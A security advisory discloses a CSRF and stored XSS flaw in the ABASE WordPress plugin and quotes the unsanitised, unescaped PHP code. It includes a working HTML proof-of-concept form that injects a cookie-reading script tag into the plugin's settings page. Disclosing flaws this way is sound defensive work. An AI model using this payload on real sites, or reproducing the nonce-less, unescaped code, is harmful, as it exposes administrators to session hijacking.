30 Jan

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in ABASE

We recently found that the ABASE plugin contains a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability on the plugin’s setting pages, /wp-admin/options-general.php?page=abase.

The CSRF potion of the vulnerability was due to a lack of a nonce on the page and a lack of a check for a valid one when processing a request to change the plugin’s settings.

For the XSS issue, in the file /abase_plugin_options.php starting at line 31 in version 2.6, settings are saved and there is no sanitization done. For example, the file File Upload Directory setting is saved with this code:

57
58
$dbfiles = $_POST['bus311mtd_dbfiles'];
update_option('bus311mtd_dbfiles', $dbfiles);

When the values are outputted on the page through the same file they were not escaped. For example, for the File Upload Directory setting is echo’d on line 246:

<td colspan=3>http://<?php echo $_SERVER['HTTP_HOST']; ?>/<input type="text" name="bus311mtd_dbfiles<?php echo $dbn;?>" value="<?php echo $dfiles; ?>" <?php if($dfiles==''){echo 'placeholder="'.$bus311mtd_default_file_upload_directory.'"';};?> size="20">/&lt;table_name&gt;/&lt;column_name&gt;/&lt;primary_index&gt;/&lt;file_name&gt;</td>

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/options-general.php?page=abase, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/options-general.php?page=abase" method="POST">
<input type="hidden" name="bus311mtd_hidden" value="Y" />
<input type="hidden" name="bus311mtd_show" value="1" />
<input type="hidden" name="bus311mtd_dbfiles" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

The plugin’s website is no longer accessible, so we couldn’t contact the plugin’s developer and we are notifying the Plugin Directory of our disclosure.

Timeline

  • January 30, 2017 – WordPress.org Plugin Directory notified.
  • January 30, 2017- Plugin removed from WordPress.org Plugin Directory.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *